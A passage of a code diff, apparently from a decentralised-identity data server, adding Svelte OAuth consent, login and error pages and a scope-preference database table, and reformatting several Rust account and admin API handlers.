const response = await fetch(`/oauth/authorize/consent?request_uri=${encodeURIComponent(requestUri)}`)
46
+
if (!response.ok) {
47
+
const data = await response.json()
48
+
error = data.error_description || data.error || 'Failed to load consent data'
49
+
loading = false
50
+
return
51
+
}
52
+
const data: ConsentData = await response.json()
53
+
consentData = data
54
+
55
+
for (const scope of data.scopes) {
56
+
if (scope.required) {
57
+
scopeSelections[scope.scope] = true
58
+
} else if (scope.granted !== null) {
59
+
scopeSelections[scope.scope] = scope.granted
60
+
} else {
61
+
scopeSelections[scope.scope] = true
62
+
}
63
+
}
64
+
65
+
if (!data.show_consent) {
66
+
await submitConsent()
67
+
}
68
+
} catch {
69
+
error = 'Failed to connect to server'
70
+
} finally {
71
+
loading = false
72
+
}
73
+
}
74
+
75
+
async function submitConsent() {
76
+
if (!consentData) return
77
+
78
+
submitting = true
79
+
const approvedScopes = Object.entries(scopeSelections)
80
+
.filter(([_, approved]) => approved)
81
+
.map(([scope]) => scope)
82
+
83
+
try {
84
+
const response = await fetch('/oauth/authorize/consent', {
85
+
method: 'POST',
86
+
headers: { 'Content-Type': 'application/json' },
87
+
body: JSON.stringify({
88
+
request_uri: consentData.request_uri,
89
+
approved_scopes: approvedScopes,
90
+
remember: rememberChoice
91
+
})
92
+
})
93
+
94
+
if (!response.ok) {
95
+
const data = await response.json()
96
+
error = data.error_description || data.error || 'Authorization failed'
97
+
submitting = false
98
+
return
99
+
}
100
+
101
+
const data = await response.json()
102
+
if (data.redirect_uri) {
103
+
window.location.href = data.redirect_uri
104
+
}
105
+
} catch {
106
+
error = 'Failed to complete authorization'
107
+
submitting = false
108
+
}
109
+
}
110
+
111
+
async function handleDeny() {
112
+
if (!consentData) return
113
+
114
+
submitting = true
115
+
try {
116
+
const response = await fetch('/oauth/authorize/deny', {
117
+
method: 'POST',
118
+
headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
119
+
body: `request_uri=${encodeURIComponent(consentData.request_uri)}`
120
+
})
121
+
122
+
if (response.redirected) {
123
+
window.location.href = response.url
124
+
}
125
+
} catch {
126
+
error = 'Failed to deny authorization'
127
+
submitting = false
128
+
}
129
+
}
130
+
131
+
function handleScopeToggle(scope: string) {
132
+
const scopeInfo = consentData?.scopes.find(s => s.scope === scope)
133
+
if (scopeInfo?.required) return
134
+
scopeSelections[scope] = !scopeSelections[scope]
135
+
}
136
+
137
+
function groupScopesByCategory(scopes: ScopeInfo[]): Record<string, ScopeInfo[]> {
138
+
const groups: Record<string, ScopeInfo[]> = {}
139
+
for (const scope of scopes) {
140
+
if (!groups[scope.category]) {
141
+
groups[scope.category] = []
142
+
}
143
+
groups[scope.category].push(scope)
144
+
}
145
+
return groups
146
+
}
147
+
148
+
$effect(() => {
149
+
fetchConsentData()
150
+
})
151
+
152
+
let scopeGroups = $derived(consentData ? groupScopesByCategory(consentData.scopes) : {})
153
+
</script>
154
+
155
+
<div class="consent-container">
156
+
{#if loading}
157
+
<div class="loading">
158
+
<p>Loading...</p>
159
+
</div>
160
+
{:else if error}
161
+
<div class="error-container">
162
+
<h1>Authorization Error</h1>
163
+
<div class="error">{error}</div>
164
+
<button type="button" onclick={() => navigate('/login')}>
165
+
Return to Login
166
+
</button>
167
+
</div>
168
+
{:else if consentData}
169
+
<div class="client-info">
170
+
{#if consentData.logo_uri}
171
+
<img src={consentData.logo_uri} alt="" class="client-logo" />
172
+
{/if}
173
+
<h1>{consentData.client_name || 'Application'}</h1>
174
+
<p class="subtitle">wants to access your account</p>
175
+
{#if consentData.client_uri}
176
+
<a href={consentData.client_uri} target="_blank" rel="noopener noreferrer" class="client-link">
177
+
{consentData.client_uri}
178
+
</a>
179
+
{/if}
180
+
</div>
181
+
182
+
<div class="account-info">
183
+
<span class="label">Signing in as:</span>
184
+
<span class="did">{consentData.did}</span>
185
+
</div>
186
+
187
+
<div class="scopes-section">
188
+
<h2>Permissions Requested</h2>
189
+
{#each Object.entries(scopeGroups) as [category, scopes]}
190
+
<div class="scope-group">
191
+
<h3 class="category-title">{category}</h3>
192
+
{#each scopes as scope}
193
+
<label class="scope-item" class:required={scope.required}>
194
+
<input
195
+
type="checkbox"
196
+
checked={scopeSelections[scope.scope]}
197
+
disabled={scope.required || submitting}
198
+
onchange={() => handleScopeToggle(scope.scope)}
199
+
/>
200
+
<div class="scope-info">
201
+
<span class="scope-name">{scope.display_name}</span>
202
+
<span class="scope-description">{scope.description}</span>
203
+
{#if scope.required}
204
+
<span class="required-badge">Required</span>
205
+
{/if}
206
+
</div>
207
+
</label>
208
+
{/each}
209
+
</div>
210
+
{/each}
211
+
</div>
212
+
213
+
<label class="remember-choice">
214
+
<input type="checkbox" bind:checked={rememberChoice} disabled={submitting} />
215
+
<span>Remember my choice for this application</span>
216
+
</label>
217
+
218
+
<div class="actions">
219
+
<button type="button" class="deny-btn" onclick={handleDeny} disabled={submitting}>
220
+
Deny
221
+
</button>
222
+
<button type="button" class="approve-btn" onclick={submitConsent} disabled={submitting}>
223
+
{submitting ? 'Authorizing...' : 'Authorize'}
224
+
</button>
225
+
</div>
226
+
{/if}
227
+
</div>
228
+
229
+
<style>
230
+
.consent-container {
231
+
max-width: 480px;
232
+
margin: 2rem auto;
233
+
padding: 2rem;
234
+
}
235
+
236
+
.loading {
237
+
display: flex;
238
+
align-items: center;
239
+
justify-content: center;
240
+
min-height: 200px;
241
+
color: var(--text-secondary);
242
+
}
243
+
244
+
.error-container {
245
+
text-align: center;
246
+
}
247
+
248
+
.error {
249
+
padding: 0.75rem;
250
+
background: var(--error-bg);
251
+
border: 1px solid var(--error-border);
252
+
border-radius: 4px;
253
+
color: var(--error-text);
254
+
margin-bottom: 1rem;
255
+
}
256
+
257
+
.client-info {
258
+
text-align: center;
259
+
margin-bottom: 1.5rem;
260
+
}
261
+
262
+
.client-logo {
263
+
width: 64px;
264
+
height: 64px;
265
+
border-radius: 12px;
266
+
margin-bottom: 1rem;
267
+
}
268
+
269
+
.client-info h1 {
270
+
margin: 0 0 0.25rem 0;
271
+
font-size: 1.5rem;
272
+
}
273
+
274
+
.subtitle {
275
+
color: var(--text-secondary);
276
+
margin: 0;
277
+
}
278
+
279
+
.client-link {
280
+
display: inline-block;
281
+
margin-top: 0.5rem;
282
+
font-size: 0.875rem;
283
+
color: var(--accent);
284
+
text-decoration: none;
285
+
}
286
+
287
+
.client-link:hover {
288
+
text-decoration: underline;
289
+
}
290
+
291
+
.account-info {
292
+
display: flex;
293
+
flex-direction: column;
294
+
gap: 0.25rem;
295
+
padding: 1rem;
296
+
background: var(--bg-secondary);
297
+
border-radius: 8px;
298
+
margin-bottom: 1.5rem;
299
+
}
300
+
301
+
.account-info .label {
302
+
font-size: 0.75rem;
303
+
color: var(--text-muted);
304
+
text-transform: uppercase;
305
+
letter-spacing: 0.05em;
306
+
}
307
+
308
+
.account-info .did {
309
+
font-family: monospace;
310
+
font-size: 0.875rem;
311
+
color: var(--text-primary);
312
+
word-break: break-all;
313
+
}
314
+
315
+
.scopes-section {
316
+
margin-bottom: 1.5rem;
317
+
}
318
+
319
+
.scopes-section h2 {
320
+
font-size: 1rem;
321
+
margin: 0 0 1rem 0;
322
+
color: var(--text-secondary);
323
+
}
324
+
325
+
.scope-group {
326
+
margin-bottom: 1rem;
327
+
}
328
+
329
+
.category-title {
330
+
font-size: 0.875rem;
331
+
font-weight: 600;
332
+
color: var(--text-primary);
333
+
margin: 0 0 0.5rem 0;
334
+
padding-bottom: 0.25rem;
335
+
border-bottom: 1px solid var(--border-color);
336
+
}
337
+
338
+
.scope-item {
339
+
display: flex;
340
+
gap: 0.75rem;
341
+
padding: 0.75rem;
342
+
background: var(--bg-card);
343
+
border: 1px solid var(--border-color);
344
+
border-radius: 6px;
345
+
margin-bottom: 0.5rem;
346
+
cursor: pointer;
347
+
transition: border-color 0.15s;
348
+
}
349
+
350
+
.scope-item:hover:not(.required) {
351
+
border-color: var(--accent);
352
+
}
353
+
354
+
.scope-item.required {
355
+
background: var(--bg-secondary);
356
+
}
357
+
358
+
.scope-item input[type="checkbox"] {
359
+
flex-shrink: 0;
360
+
width: 18px;
361
+
height: 18px;
362
+
margin-top: 2px;
363
+
}
364
+
365
+
.scope-info {
366
+
flex: 1;
367
+
display: flex;
368
+
flex-direction: column;
369
+
gap: 0.125rem;
370
+
}
371
+
372
+
.scope-name {
373
+
font-weight: 500;
374
+
color: var(--text-primary);
375
+
}
376
+
377
+
.scope-description {
378
+
font-size: 0.875rem;
379
+
color: var(--text-secondary);
380
+
}
381
+
382
+
.required-badge {
383
+
display: inline-block;
384
+
font-size: 0.625rem;
385
+
padding: 0.125rem 0.375rem;
386
+
background: var(--warning-bg);
387
+
color: var(--warning-text);
388
+
border-radius: 3px;
389
+
text-transform: uppercase;
390
+
letter-spacing: 0.05em;
391
+
margin-top: 0.25rem;
392
+
width: fit-content;
393
+
}
394
+
395
+
.remember-choice {
396
+
display: flex;
397
+
align-items: center;
398
+
gap: 0.5rem;
399
+
margin-bottom: 1.5rem;
400
+
cursor: pointer;
401
+
color: var(--text-secondary);
402
+
font-size: 0.875rem;
403
+
}
404
+
405
+
.remember-choice input {
406
+
width: 16px;
407
+
height: 16px;
408
+
}
409
+
410
+
.actions {
411
+
display: flex;
412
+
gap: 1rem;
413
+
}
414
+
415
+
.actions button {
416
+
flex: 1;
417
+
padding: 0.875rem;
418
+
border: none;
419
+
border-radius: 6px;
420
+
font-size: 1rem;
421
+
font-weight: 500;
422
+
cursor: pointer;
423
+
transition: background-color 0.15s;
424
+
}
425
+
426
+
.actions button:disabled {
427
+
opacity: 0.6;
428
+
cursor: not-allowed;
429
+
}
430
+
431
+
.deny-btn {
432
+
background: var(--bg-secondary);
433
+
color: var(--text-primary);
434
+
border: 1px solid var(--border-color);
435
+
}
436
+
437
+
.deny-btn:hover:not(:disabled) {
438
+
background: var(--error-bg);
439
+
border-color: var(--error-border);
440
+
color: var(--error-text);
441
+
}
442
+
443
+
.approve-btn {
444
+
background: var(--accent);
445
+
color: white;
446
+
}
447
+
448
+
.approve-btn:hover:not(:disabled) {
449
+
background: var(--accent-hover);
450
+
}
451
+
</style>
+81
frontend/src/routes/OAuthError.svelte
+81
frontend/src/routes/OAuthError.svelte
···
···
1
+
<script lang="ts">
2
+
function getError(): string {
3
+
const params = new URLSearchParams(window.location.hash.split('?')[1] || '')
4
+
return params.get('error') || 'Unknown error'
5
+
}
6
+
7
+
function getErrorDescription(): string | null {
8
+
const params = new URLSearchParams(window.location.hash.split('?')[1] || '')
9
+
return params.get('error_description')
10
+
}
11
+
12
+
function handleBack() {
13
+
window.history.back()
14
+
}
15
+
16
+
let error = $derived(getError())
17
+
let errorDescription = $derived(getErrorDescription())
18
+
</script>
19
+
20
+
<div class="oauth-error-container">
21
+
<h1>Authorization Error</h1>
22
+
23
+
<div class="error-box">
24
+
<div class="error-code">{error}</div>
25
+
{#if errorDescription}
26
+
<div class="error-description">{errorDescription}</div>
27
+
{/if}
28
+
</div>
29
+
30
+
<button type="button" onclick={handleBack}>
31
+
Go Back
32
+
</button>
33
+
</div>
34
+
35
+
<style>
36
+
.oauth-error-container {
37
+
max-width: 400px;
38
+
margin: 4rem auto;
39
+
padding: 2rem;
40
+
text-align: center;
41
+
}
42
+
43
+
h1 {
44
+
margin: 0 0 1.5rem 0;
45
+
color: var(--error-text);
46
+
}
47
+
48
+
.error-box {
49
+
padding: 1.5rem;
50
+
background: var(--error-bg);
51
+
border: 1px solid var(--error-border);
52
+
border-radius: 8px;
53
+
margin-bottom: 1.5rem;
54
+
}
55
+
56
+
.error-code {
57
+
font-family: monospace;
58
+
font-size: 1rem;
59
+
color: var(--error-text);
60
+
margin-bottom: 0.5rem;
61
+
}
62
+
63
+
.error-description {
64
+
color: var(--text-secondary);
65
+
font-size: 0.875rem;
66
+
}
67
+
68
+
button {
69
+
padding: 0.75rem 1.5rem;
70
+
background: var(--accent);
71
+
color: white;
72
+
border: none;
73
+
border-radius: 4px;
74
+
font-size: 1rem;
75
+
cursor: pointer;
76
+
}
77
+
78
+
button:hover {
79
+
background: var(--accent-hover);
80
+
}
81
+
</style>
+269
frontend/src/routes/OAuthLogin.svelte
+269
frontend/src/routes/OAuthLogin.svelte
···
···
1
+
<script lang="ts">
2
+
import { navigate } from '../lib/router.svelte'
3
+
4
+
let username = $state('')
5
+
let password = $state('')
6
+
let rememberDevice = $state(false)
7
+
let submitting = $state(false)
8
+
let error = $state<string | null>(null)
9
+
10
+
function getRequestUri(): string | null {
11
+
const params = new URLSearchParams(window.location.hash.split('?')[1] || '')
12
+
return params.get('request_uri')
13
+
}
14
+
15
+
function getErrorFromUrl(): string | null {
16
+
const params = new URLSearchParams(window.location.hash.split('?')[1] || '')
17
+
return params.get('error')
18
+
}
19
+
20
+
$effect(() => {
21
+
const urlError = getErrorFromUrl()
22
+
if (urlError) {
23
+
error = urlError
24
+
}
25
+
})
26
+
27
+
async function handleSubmit(e: Event) {
28
+
e.preventDefault()
29
+
const requestUri = getRequestUri()
30
+
if (!requestUri) {
31
+
error = 'Missing request_uri parameter'
32
+
return
33
+
}
34
+
35
+
submitting = true
36
+
error = null
37
+
38
+
try {
39
+
const response = await fetch('/oauth/authorize', {
40
+
method: 'POST',
41
+
headers: {
42
+
'Content-Type': 'application/json',
43
+
'Accept': 'application/json'
44
+
},
45
+
body: JSON.stringify({
46
+
request_uri: requestUri,
47
+
username,
48
+
password,
49
+
remember_device: rememberDevice
50
+
})
51
+
})
52
+
53
+
const data = await response.json()
54
+
55
+
if (!response.ok) {
56
+
error = data.error_description || data.error || 'Login failed'
57
+
submitting = false
58
+
return
59
+
}
60
+
61
+
if (data.needs_2fa) {
62
+
navigate(`/oauth/2fa?request_uri=${encodeURIComponent(requestUri)}&channel=${encodeURIComponent(data.channel || '')}`)
63
+
return
64
+
}
65
+
66
+
if (data.redirect_uri) {
67
+
window.location.href = data.redirect_uri
68
+
return
69
+
}
70
+
71
+
error = 'Unexpected response from server'
72
+
submitting = false
73
+
} catch {
74
+
error = 'Failed to connect to server'
75
+
submitting = false
76
+
}
77
+
}
78
+
79
+
async function handleCancel() {
80
+
const requestUri = getRequestUri()
81
+
if (!requestUri) {
82
+
window.history.back()
83
+
return
84
+
}
85
+
86
+
submitting = true
87
+
try {
88
+
const response = await fetch('/oauth/authorize/deny', {
89
+
method: 'POST',
90
+
headers: {
91
+
'Content-Type': 'application/json',
92
+
'Accept': 'application/json'
93
+
},
94
+
body: JSON.stringify({ request_uri: requestUri })
95
+
})
96
+
97
+
const data = await response.json()
98
+
if (data.redirect_uri) {
99
+
window.location.href = data.redirect_uri
100
+
}
101
+
} catch {
102
+
window.history.back()
103
+
}
104
+
}
105
+
</script>
106
+
107
+
<div class="oauth-login-container">
108
+
<h1>Sign In</h1>
109
+
<p class="subtitle">Sign in to continue to the application</p>
110
+
111
+
{#if error}
112
+
<div class="error">{error}</div>
113
+
{/if}
114
+
115
+
<form onsubmit={handleSubmit}>
116
+
<div class="field">
117
+
<label for="username">Handle or Email</label>
118
+
<input
119
+
id="username"
120
+
type="text"
121
+
bind:value={username}
122
+
placeholder="you@example.com or handle"
123
+
disabled={submitting}
124
+
required
125
+
autocomplete="username"
126
+
/>
127
+
</div>
128
+
129
+
<div class="field">
130
+
<label for="password">Password</label>
131
+
<input
132
+
id="password"
133
+
type="password"
134
+
bind:value={password}
135
+
disabled={submitting}
136
+
required
137
+
autocomplete="current-password"
138
+
/>
139
+
</div>
140
+
141
+
<label class="remember-device">
142
+
<input type="checkbox" bind:checked={rememberDevice} disabled={submitting} />
143
+
<span>Remember this device</span>
144
+
</label>
145
+
146
+
<div class="actions">
147
+
<button type="button" class="cancel-btn" onclick={handleCancel} disabled={submitting}>
148
+
Cancel
149
+
</button>
150
+
<button type="submit" class="submit-btn" disabled={submitting || !username || !password}>
151
+
{submitting ? 'Signing in...' : 'Sign In'}
152
+
</button>
153
+
</div>
154
+
</form>
155
+
</div>
156
+
157
+
<style>
158
+
.oauth-login-container {
159
+
max-width: 400px;
160
+
margin: 4rem auto;
161
+
padding: 2rem;
162
+
}
163
+
164
+
h1 {
165
+
margin: 0 0 0.5rem 0;
166
+
}
167
+
168
+
.subtitle {
169
+
color: var(--text-secondary);
170
+
margin: 0 0 2rem 0;
171
+
}
172
+
173
+
form {
174
+
display: flex;
175
+
flex-direction: column;
176
+
gap: 1rem;
177
+
}
178
+
179
+
.field {
180
+
display: flex;
181
+
flex-direction: column;
182
+
gap: 0.25rem;
183
+
}
184
+
185
+
label {
186
+
font-size: 0.875rem;
187
+
font-weight: 500;
188
+
}
189
+
190
+
input[type="text"],
191
+
input[type="password"] {
192
+
padding: 0.75rem;
193
+
border: 1px solid var(--border-color-light);
194
+
border-radius: 4px;
195
+
font-size: 1rem;
196
+
background: var(--bg-input);
197
+
color: var(--text-primary);
198
+
}
199
+
200
+
input:focus {
201
+
outline: none;
202
+
border-color: var(--accent);
203
+
}
204
+
205
+
.remember-device {
206
+
display: flex;
207
+
align-items: center;
208
+
gap: 0.5rem;
209
+
cursor: pointer;
210
+
color: var(--text-secondary);
211
+
font-size: 0.875rem;
212
+
}
213
+
214
+
.remember-device input {
215
+
width: 16px;
216
+
height: 16px;
217
+
}
218
+
219
+
.error {
220
+
padding: 0.75rem;
221
+
background: var(--error-bg);
222
+
border: 1px solid var(--error-border);
223
+
border-radius: 4px;
224
+
color: var(--error-text);
225
+
margin-bottom: 1rem;
226
+
}
227
+
228
+
.actions {
229
+
display: flex;
230
+
gap: 1rem;
231
+
margin-top: 0.5rem;
232
+
}
233
+
234
+
.actions button {
235
+
flex: 1;
236
+
padding: 0.75rem;
237
+
border: none;
238
+
border-radius: 4px;
239
+
font-size: 1rem;
240
+
cursor: pointer;
241
+
transition: background-color 0.15s;
242
+
}
243
+
244
+
.actions button:disabled {
245
+
opacity: 0.6;
246
+
cursor: not-allowed;
247
+
}
248
+
249
+
.cancel-btn {
250
+
background: var(--bg-secondary);
251
+
color: var(--text-primary);
252
+
border: 1px solid var(--border-color);
253
+
}
254
+
255
+
.cancel-btn:hover:not(:disabled) {
256
+
background: var(--error-bg);
257
+
border-color: var(--error-border);
258
+
color: var(--error-text);
259
+
}
260
+
261
+
.submit-btn {
262
+
background: var(--accent);
263
+
color: white;
264
+
}
265
+
266
+
.submit-btn:hover:not(:disabled) {
267
+
background: var(--accent-hover);
268
+
}
269
+
</style>
+12
migrations/20251221_oauth_scope_preferences.sql
+12
migrations/20251221_oauth_scope_preferences.sql
···
···
1
+
CREATE TABLE oauth_scope_preference (
2
+
id UUID PRIMARY KEY DEFAULT gen_random_uuid(),
3
+
did TEXT NOT NULL REFERENCES users(did) ON DELETE CASCADE,
4
+
client_id TEXT NOT NULL,
5
+
scope TEXT NOT NULL,
6
+
granted BOOLEAN NOT NULL DEFAULT TRUE,
7
+
created_at TIMESTAMPTZ NOT NULL DEFAULT NOW(),
8
+
updated_at TIMESTAMPTZ NOT NULL DEFAULT NOW(),
9
+
UNIQUE(did, client_id, scope)
10
+
);
11
+
12
+
CREATE INDEX idx_oauth_scope_pref_lookup ON oauth_scope_preference(did, client_id);
+33
-29
src/api/actor/preferences.rs
+33
-29
src/api/actor/preferences.rs
···
32
.into_response();
33
}
34
};
35
-
let auth_user = match crate::auth::validate_bearer_token_allow_deactivated(&state.db, &token).await {
36
-
Ok(user) => user,
37
-
Err(_) => {
38
-
return (
39
-
StatusCode::UNAUTHORIZED,
40
-
Json(json!({"error": "AuthenticationFailed"})),
41
-
)
42
-
.into_response();
43
-
}
44
-
};
45
let user_id: uuid::Uuid =
46
match sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", auth_user.did)
47
.fetch_optional(&state.db)
···
109
.into_response();
110
}
111
};
112
-
let auth_user = match crate::auth::validate_bearer_token_allow_deactivated(&state.db, &token).await {
113
-
Ok(user) => user,
114
-
Err(_) => {
115
return (
116
-
StatusCode::UNAUTHORIZED,
117
-
Json(json!({"error": "AuthenticationFailed"})),
118
)
119
.into_response();
120
}
121
};
122
-
let (user_id, is_migration): (uuid::Uuid, bool) =
123
-
match sqlx::query!("SELECT id, deactivated_at FROM users WHERE did = $1", auth_user.did)
124
-
.fetch_optional(&state.db)
125
-
.await
126
-
{
127
-
Ok(Some(row)) => (row.id, row.deactivated_at.is_some()),
128
-
_ => {
129
-
return (
130
-
StatusCode::INTERNAL_SERVER_ERROR,
131
-
Json(json!({"error": "InternalError", "message": "User not found"})),
132
-
)
133
-
.into_response();
134
-
}
135
-
};
136
if input.preferences.len() > MAX_PREFERENCES_COUNT {
137
return (
138
StatusCode::BAD_REQUEST,
···
32
.into_response();
33
}
34
};
35
+
let auth_user =
36
+
match crate::auth::validate_bearer_token_allow_deactivated(&state.db, &token).await {
37
+
Ok(user) => user,
38
+
Err(_) => {
39
+
return (
40
+
StatusCode::UNAUTHORIZED,
41
+
Json(json!({"error": "AuthenticationFailed"})),
42
+
)
43
+
.into_response();
44
+
}
45
+
};
46
let user_id: uuid::Uuid =
47
match sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", auth_user.did)
48
.fetch_optional(&state.db)
···
110
.into_response();
111
}
112
};
113
+
let auth_user =
114
+
match crate::auth::validate_bearer_token_allow_deactivated(&state.db, &token).await {
115
+
Ok(user) => user,
116
+
Err(_) => {
117
+
return (
118
+
StatusCode::UNAUTHORIZED,
119
+
Json(json!({"error": "AuthenticationFailed"})),
120
+
)
121
+
.into_response();
122
+
}
123
+
};
124
+
let (user_id, is_migration): (uuid::Uuid, bool) = match sqlx::query!(
125
+
"SELECT id, deactivated_at FROM users WHERE did = $1",
126
+
auth_user.did
127
+
)
128
+
.fetch_optional(&state.db)
129
+
.await
130
+
{
131
+
Ok(Some(row)) => (row.id, row.deactivated_at.is_some()),
132
+
_ => {
133
return (
134
+
StatusCode::INTERNAL_SERVER_ERROR,
135
+
Json(json!({"error": "InternalError", "message": "User not found"})),
136
)
137
.into_response();
138
}
139
};
140
if input.preferences.len() > MAX_PREFERENCES_COUNT {
141
return (
142
StatusCode::BAD_REQUEST,
+2
-3
src/api/admin/account/info.rs
+2
-3
src/api/admin/account/info.rs
+27
-13
src/api/admin/account/search.rs
+27
-13
src/api/admin/account/search.rs
···
54
let limit = params.limit.clamp(1, 100);
55
let cursor_did = params.cursor.as_deref().unwrap_or("");
56
let handle_filter = params.handle.as_deref().map(|h| format!("%{}%", h));
57
-
let result = sqlx::query_as::<_, (String, String, Option<String>, chrono::DateTime<chrono::Utc>, bool, Option<chrono::DateTime<chrono::Utc>>)>(
58
r#"
59
SELECT did, handle, email, created_at, email_verified, deactivated_at
60
FROM users
···
74
let accounts: Vec<AccountView> = rows
75
.into_iter()
76
.take(limit as usize)
77
-
.map(|(did, handle, email, created_at, email_verified, deactivated_at)| AccountView {
78
-
did: did.clone(),
79
-
handle,
80
-
email,
81
-
indexed_at: created_at.to_rfc3339(),
82
-
email_verified_at: if email_verified {
83
-
Some(created_at.to_rfc3339())
84
-
} else {
85
-
None
86
},
87
-
deactivated_at: deactivated_at.map(|dt| dt.to_rfc3339()),
88
-
invites_disabled: None,
89
-
})
90
.collect();
91
let next_cursor = if has_more {
92
accounts.last().map(|a| a.did.clone())
···
54
let limit = params.limit.clamp(1, 100);
55
let cursor_did = params.cursor.as_deref().unwrap_or("");
56
let handle_filter = params.handle.as_deref().map(|h| format!("%{}%", h));
57
+
let result = sqlx::query_as::<
58
+
_,
59
+
(
60
+
String,
61
+
String,
62
+
Option<String>,
63
+
chrono::DateTime<chrono::Utc>,
64
+
bool,
65
+
Option<chrono::DateTime<chrono::Utc>>,
66
+
),
67
+
>(
68
r#"
69
SELECT did, handle, email, created_at, email_verified, deactivated_at
70
FROM users
···
84
let accounts: Vec<AccountView> = rows
85
.into_iter()
86
.take(limit as usize)
87
+
.map(
88
+
|(did, handle, email, created_at, email_verified, deactivated_at)| {
89
+
AccountView {
90
+
did: did.clone(),
91
+
handle,
92
+
email,
93
+
indexed_at: created_at.to_rfc3339(),
94
+
email_verified_at: if email_verified {
95
+
Some(created_at.to_rfc3339())
96
+
} else {
97
+
None
98
+
},
99
+
deactivated_at: deactivated_at.map(|dt| dt.to_rfc3339()),
100
+
invites_disabled: None,
101
+
}
102
},
103
+
)
104
.collect();
105
let next_cursor = if has_more {
106
accounts.last().map(|a| a.did.clone())
+10
-12
src/api/admin/server_stats.rs
+10
-12
src/api/admin/server_stats.rs
···
16
pub blob_storage_bytes: i64,
17
}
18
19
-
pub async fn get_server_stats(
20
-
State(state): State<AppState>,
21
-
_auth: BearerAuthAdmin,
22
-
) -> Response {
23
let user_count: i64 = match sqlx::query_scalar!("SELECT COUNT(*) FROM users")
24
.fetch_one(&state.db)
25
.await
···
47
Err(_) => 0,
48
};
49
50
-
let blob_storage_bytes: i64 = match sqlx::query_scalar!("SELECT COALESCE(SUM(size_bytes), 0)::BIGINT FROM blobs")
51
-
.fetch_one(&state.db)
52
-
.await
53
-
{
54
-
Ok(Some(bytes)) => bytes,
55
-
Ok(None) => 0,
56
-
Err(_) => 0,
57
-
};
58
59
Json(ServerStatsResponse {
60
user_count,
···
16
pub blob_storage_bytes: i64,
17
}
18
19
+
pub async fn get_server_stats(State(state): State<AppState>, _auth: BearerAuthAdmin) -> Response {
20
let user_count: i64 = match sqlx::query_scalar!("SELECT COUNT(*) FROM users")
21
.fetch_one(&state.db)
22
.await
···
44
Err(_) => 0,
45
};
46
47
+
let blob_storage_bytes: i64 =
48
+
match sqlx::query_scalar!("SELECT COALESCE(SUM(size_bytes), 0)::BIGINT FROM blobs")
49
+
.fetch_one(&state.db)
50
+
.await
51
+
{
52
+
Ok(Some(bytes)) => bytes,
53
+
Ok(None) => 0,
54
+
Err(_) => 0,
55
+
};
56
57
Json(ServerStatsResponse {
58
user_count,
+164
-147
src/api/identity/account.rs
+164
-147
src/api/identity/account.rs
···
21
fn extract_client_ip(headers: &HeaderMap) -> String {
22
if let Some(forwarded) = headers.get("x-forwarded-for")
23
&& let Ok(value) = forwarded.to_str()
24
-
&& let Some(first_ip) = value.split(',').next() {
25
-
return first_ip.trim().to_string();
26
-
}
27
if let Some(real_ip) = headers.get("x-real-ip")
28
-
&& let Ok(value) = real_ip.to_str() {
29
-
return value.trim().to_string();
30
-
}
31
"unknown".to_string()
32
}
33
···
114
};
115
116
let is_migration = migration_auth.is_some()
117
-
&& input.did.as_ref().map(|d| d.starts_with("did:plc:")).unwrap_or(false);
118
119
if is_migration {
120
let migration_did = input.did.as_ref().unwrap();
···
147
.map(|e| e.trim().to_string())
148
.filter(|e| !e.is_empty());
149
if let Some(ref email) = email
150
-
&& !crate::api::validation::is_valid_email(email) {
151
-
return (
152
-
StatusCode::BAD_REQUEST,
153
-
Json(json!({"error": "InvalidEmail", "message": "Invalid email format"})),
154
-
)
155
-
.into_response();
156
-
}
157
let verification_channel = input.verification_channel.as_deref().unwrap_or("email");
158
let valid_channels = ["email", "discord", "telegram", "signal"];
159
if !valid_channels.contains(&verification_channel) && !is_migration {
···
366
};
367
if is_migration {
368
let existing_account: Option<(uuid::Uuid, String, Option<chrono::DateTime<chrono::Utc>>)> =
369
-
sqlx::query_as(
370
-
"SELECT id, handle, deactivated_at FROM users WHERE did = $1 FOR UPDATE",
371
-
)
372
-
.bind(&did)
373
-
.fetch_optional(&mut *tx)
374
-
.await
375
-
.unwrap_or(None);
376
if let Some((account_id, old_handle, deactivated_at)) = existing_account {
377
if deactivated_at.is_some() {
378
info!(did = %did, old_handle = %old_handle, new_handle = %short_handle, "Preparing existing account for inbound migration");
379
-
let update_result: Result<_, sqlx::Error> = sqlx::query(
380
-
"UPDATE users SET handle = $1 WHERE id = $2",
381
-
)
382
-
.bind(short_handle)
383
-
.bind(account_id)
384
-
.execute(&mut *tx)
385
-
.await;
386
if let Err(e) = update_result {
387
-
if let Some(db_err) = e.as_database_error() {
388
-
if db_err.constraint().map(|c| c.contains("handle")).unwrap_or(false) {
389
-
return (
390
StatusCode::BAD_REQUEST,
391
Json(json!({"error": "HandleTaken", "message": "Handle already taken by another account"})),
392
)
393
.into_response();
394
-
}
395
}
396
error!("Error reactivating account: {:?}", e);
397
return (
···
438
.into_response();
439
}
440
};
441
-
let access_meta = match crate::auth::create_access_token_with_metadata(&did, &secret_key_bytes) {
442
-
Ok(m) => m,
443
-
Err(e) => {
444
-
error!("Error creating access token: {:?}", e);
445
-
return (
446
-
StatusCode::INTERNAL_SERVER_ERROR,
447
-
Json(json!({"error": "InternalError"})),
448
-
)
449
-
.into_response();
450
-
}
451
-
};
452
-
let refresh_meta = match crate::auth::create_refresh_token_with_metadata(&did, &secret_key_bytes) {
453
Ok(m) => m,
454
Err(e) => {
455
error!("Error creating refresh token: {:?}", e);
···
499
}
500
}
501
}
502
-
let exists_result: Option<(i32,)> = sqlx::query_as(
503
-
"SELECT 1 FROM users WHERE handle = $1 AND deactivated_at IS NULL",
504
-
)
505
-
.bind(short_handle)
506
-
.fetch_optional(&mut *tx)
507
-
.await
508
-
.unwrap_or(None);
509
if exists_result.is_some() {
510
return (
511
StatusCode::BAD_REQUEST,
···
516
let invite_code_required = std::env::var("INVITE_CODE_REQUIRED")
517
.map(|v| v == "true" || v == "1")
518
.unwrap_or(false);
519
-
if invite_code_required && input.invite_code.as_ref().map(|c| c.trim().is_empty()).unwrap_or(true) {
520
return (
521
StatusCode::BAD_REQUEST,
522
Json(json!({"error": "InvalidInviteCode", "message": "Invite code is required"})),
523
)
524
.into_response();
525
}
526
-
if let Some(code) = &input.invite_code {
527
-
if !code.trim().is_empty() {
528
-
let invite_query = sqlx::query!(
529
-
"SELECT available_uses FROM invite_codes WHERE code = $1 FOR UPDATE",
530
-
code
531
-
)
532
-
.fetch_optional(&mut *tx)
533
-
.await;
534
-
